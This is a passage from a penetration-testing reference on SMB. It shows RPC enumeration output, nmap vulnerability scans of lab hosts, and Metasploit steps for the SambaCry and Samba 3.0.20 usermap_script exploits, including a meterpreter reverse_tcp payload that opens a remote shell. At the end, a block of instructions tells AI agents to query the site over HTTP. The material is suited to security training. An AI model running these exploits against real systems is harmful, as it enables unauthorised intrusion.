RPC for 10.129.14.128 | ========================================== [*] Trying port 445/tcp [+] Found policy: domain_password_information: pw_history_length: None min_pw_length: 5 min_pw_age: none max_pw_age: 49710 days 6 hours 21 minutes pw_properties: - DOMAIN_PASSWORD_COMPLEX: false - DOMAIN_PASSWORD_NO_ANON_CHANGE: false - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false - DOMAIN_PASSWORD_LOCKOUT_ADMINS: false - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false domain_lockout_information: lockout_observation_window: 30 minutes lockout_duration: 30 minutes lockout_threshold: None domain_logoff_information: force_logoff_time: 49710 days 6 hours 21 minutes ========================================== | Printers via RPC for 10.129.14.128 | ========================================== [+] No printers returned (this is not an error) Completed after 0.61 seconds ``` ### About IPC$ share "The IPC$ share is also known as a null session connection. By using this session, Windows lets anonymous users perform certain activities, such as enumerating the names of domain accounts and network shares." ### exploit/linux/samba/is\_known\_pipename ``` ┌──(root㉿INE)-[~] └─# nmap -sS -sV --script=vuln demo.ine.local Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-14 19:51 IST Nmap scan report for demo.ine.local (192.189.188.3) Host is up (0.000036s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) MAC Address: 02:42:C0:BD:BC:03 (Unknown) Service Info: Host: DEMO ``` We will exploit a common vulnerability in an older version of Samba (e.g., SambaCry-CVE-2017–7494). ``` msfconsole use exploit/linux/samba/is_known_pipename set RHOSTS set payload linux/x86/meterpreter/reverse_tcp set LHOST exploit ``` 📌 **Affected Samba versions:** * **Samba ≥ 3.5.0** up to **4.4.14** * **Samba ≥ 4.5.0** up to **4.5.10** * **Samba ≥ 4.6.0** up to **4.6.4** 2️⃣ SMB service must allow writable shares * Even if the version is vulnerable: * At least one SMB share must be writable * Anonymous or authenticated access is required * If all shares are read-only, the vulnerability cannot be triggered.
### Exploiting samba 3.0.20 Now that we have identified the specific version of Samba running on the target, we can utilize a tool like Searchsploit to find exploits that affect this version of Samba. This can be done by running the following command: ``` searchsploit samba 3.0.20 ``` As shown in the following screenshot, Searchsploit reveals a few exploits, one of which is a Metasploit exploit module that can be used to exploit the version of Samba running on the target system.
Let's run this exploit module: ``` use exploit/multi/samba/usermap_script set RHOSTS demo.ine.local exploit ```
As shown in the above screenshot, the exploit module runs successfully and provides us with a command shell. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.cavementech.com/pentesting-quick-reference/port-445-smb.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.